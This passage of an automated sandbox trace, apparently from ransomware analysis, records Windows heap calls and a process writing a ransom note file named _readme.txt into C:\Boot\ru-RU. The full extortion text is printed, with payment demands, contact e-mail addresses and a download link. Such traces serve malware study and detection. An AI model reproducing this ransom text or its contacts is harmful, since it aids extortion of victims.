lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.690] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0228.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.690] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.690] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.690] PathFindFileNameW (pszPath="") returned="" [0228.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.690] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.691] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.691] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.691] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.691] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0228.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.691] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0228.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.692] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.692] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.692] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.693] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.693] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.693] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.693] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.693] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.693] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) 